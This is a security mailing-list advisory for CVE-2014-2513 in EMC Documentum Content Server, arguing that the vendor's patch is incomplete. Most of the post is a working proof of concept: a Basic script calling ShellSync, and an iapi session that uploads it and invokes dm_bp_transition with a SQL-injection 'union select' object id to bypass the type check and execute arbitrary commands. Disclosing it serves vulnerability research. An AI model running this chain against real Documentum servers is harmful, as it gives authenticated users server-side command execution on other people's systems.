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Extra information for CVE-2014-2513 - EMC Documentum Content Server: arbitrary code execution

From: <andrew () panfilov tel>
Date: Thu, 9 Jul 2015 09:45:30 +1000

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
Risk: High
Status: public/not fixed

On November 2013 I discovered vulnerability in EMC Documentum Content Server
which allow authenticated user to execute arbitrary commands using
dm_bp_transition docbase method (for detailed description see

On July 2014 vendor announced ESA-2014-064 which was claiming that
vulnerability has been remediated.

On November 2014 fix was contested  (there was significant delay after
ESA-2014-064 because vendor constantly fails to provide status of reported
vulnerabilities) by providing another proof of concept, description provided
to CERT/CC (another CNA was chosen because vendor fails to communicate) was:

I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following

[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
error: [DM_API_W_NO_MATCH]warning:  "There was no match in the
docbase for the qualification: dm_procedure where r_object_id =

Such behaviour means that EMC tried to remediate a security issue by
“checking” object type of supplied object:

Connected to Documentum Server running Release 6.7.2190.0198  Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
[DM_API_W_NO_MATCH]warning:  "There was no match in the docbase for the
 qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"

API> Bye

bin]$ strings dmbasic| grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
# old version of dmbasic binary
bin]$ strings dmbasic| grep dm_procedure

So, the fix was implemented in dmbasic binary, the problem is neither 6.7
SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch
that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the
issue is still reproducible because introduced check could be bypassed
using SQL injection:

~]$ cat test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
End Function
~]$ cat /tmp/test
cat: /tmp/test: No such file or directory

~]$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): test01
Please enter password for test01:

      EMC Documentum iapi - Interactive API interface
      (c) Copyright EMC Corp., 1992 - 2011
      All rights reserved.
      Client Library Release 6.7.2190.0142

Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info:  "Session 0101fd088014000c started for
 user test01."

Connected to Documentum Server running Release 6.7.2190.0198  Linux.Oracle
Session id is s0
API> create,c,dm_sysobject
API> set,c,l,object_name
SET> test
API> setfile,c,l,test.ebs,crtext
API> save,c,l
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
        repo repo dmadmin "" 0000000000000000 0000000000000000
        0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
        from  dm_sysobject where r_object_id=''0801fd08805c9dfe"
        0000000000000000  0000000000000000 0000000000000000 ""
        0 0 T F T T dmadmin 0000000000000000'


(1 row affected)

API> Bye
~]$ cat /tmp/test

Here ‘union …’ allows to bypass check based on "id" call:

Connected to Documentum Server running Release 6.7.2190.0198  Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
         select r_object_id from dm_sysobject where
API> apply,c,,GET_LAST_SQL
API> next,c,q0
API> get,c,q0,result

select all dm_procedure.r_object_id from dm_procedure_sp  dm_procedure where
    ((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
    (dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
    union select all dm_sysobject.r_object_id from dm_sysobject_sp
    dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
    and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)

API> close,c,q0

Comma is required to bypass error in fetch call:
API> fetch,c,0801fd08805c9dfe' union select r_object_id from
           dm_sysobject where r_object_id='0801fd08805c9dfe
[DM_API_E_BADID]error:  "Bad ID given: 0801fd08805c9dfe' union
           select r_object_id from dm_sysobject where r_object_id=

API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
           dm_sysobject where r_object_id='0801fd08805c9dfe

Andrey B. Panfilov

Attachment: VRF#HUFPRMOP.txt

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